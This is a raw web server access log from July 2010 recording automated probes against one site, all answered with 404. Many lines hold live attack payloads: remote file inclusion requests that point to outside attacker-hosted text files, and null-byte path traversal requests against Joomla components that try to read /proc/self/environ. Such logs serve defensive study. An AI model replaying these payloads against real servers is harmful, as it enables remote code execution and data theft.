74.208.167.164 - - [31/Jul/2010:08:09:07 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:07 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:08:09:11 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:08:09:11 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:08:09:11 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:11 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:11 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:11 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:45 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:45 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:09:45 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:45 -0700] "GET /logs/access_100429.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:09:46 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:47 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:47 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:47 -0700] "GET /logs/access_100429.log//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:48 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:48 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:48 -0700] "GET /logs/access_100429.log//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:49 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:49 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:09:49 -0700] "GET /logs/access_100429.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:10:00 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:08:10:05 -0700] "GET /index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:10:30 -0700] "GET /logs/access_100524.log//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:10:31 -0700] "GET /logs/access_100524.log//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:10:43 -0700] "GET /logs/access_100524.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:10:43 -0700] "GET //bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:10:43 -0700] "GET /logs/access_100429.log///bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:10:44 -0700] "GET /logs///bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:08:11:03 -0700] "GET /logs/access_100524.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:11:41 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:11:41 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:13:05 -0700] "GET /logs/access_100615.log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:13:05 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:13:05 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
213.189.27.130 - - [31/Jul/2010:08:14:29 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
213.189.27.130 - - [31/Jul/2010:08:14:32 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:08:15:06 -0700] "GET /logs/access_100615.log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:08:15:08 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:08:15:11 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.130.250.155 - - [31/Jul/2010:08:15:17 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:08:17:04 -0700] "GET /logs/access.log/index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:08:17:04 -0700] "GET /index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:08:17:05 -0700] "GET /logs/index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:08:17:42 -0700] "GET /logs/access_100601.log/index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:08:17:42 -0700] "GET /index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:08:17:43 -0700] "GET /logs/index.php?option=com_galeria&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:41 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:41 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:52 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:20:57 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:21:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:21:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:21:39 -0700] "GET /logs/access_100429.log%20%20/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
92.60.176.46 - - [31/Jul/2010:08:22:42 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
92.60.176.46 - - [31/Jul/2010:08:22:45 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:22:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:22:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:22:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:22:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:22:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:22:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:22:59 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:22:59 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:22:59 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:23:00 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:23:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:23:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:23:21 -0700] "GET /logs/access_100428.log/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:24:27 -0700] "GET /logs/access_100429.log%20%20/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.189.27.130 - - [31/Jul/2010:08:24:42 -0700] "GET /logs/access.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
213.189.27.130 - - [31/Jul/2010:08:24:42 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
213.189.27.130 - - [31/Jul/2010:08:24:42 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
67.212.178.179 - - [31/Jul/2010:08:24:53 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
67.212.178.179 - - [31/Jul/2010:08:24:53 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
213.189.27.130 - - [31/Jul/2010:08:24:56 -0700] "GET /logs/access.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
213.189.27.130 - - [31/Jul/2010:08:24:57 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
213.189.27.130 - - [31/Jul/2010:08:24:57 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:08:25:48 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:08:25:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:08:25:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
92.60.176.46 - - [31/Jul/2010:08:26:14 -0700] "GET /logs//web/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
92.60.176.46 - - [31/Jul/2010:08:26:14 -0700] "GET /logs//web/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
92.60.176.46 - - [31/Jul/2010:08:26:15 -0700] "GET /web/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
92.60.176.46 - - [31/Jul/2010:08:26:15 -0700] "GET /web/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
67.212.178.179 - - [31/Jul/2010:08:26:29 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:27:14 -0700] "GET /logs/access_100428.log/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
89.130.250.155 - - [31/Jul/2010:08:27:34 -0700] "GET /logs/access.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
89.130.250.155 - - [31/Jul/2010:08:27:34 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:27:43 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:27:43 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:27:44 -0700] "GET /logs/access_100429.log/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
89.130.250.155 - - [31/Jul/2010:08:27:44 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:27:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:28:01 -0700] "POST /logs/access.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:28:01 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:28:05 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:28:07 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:28:07 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:28:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:08:29:04 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
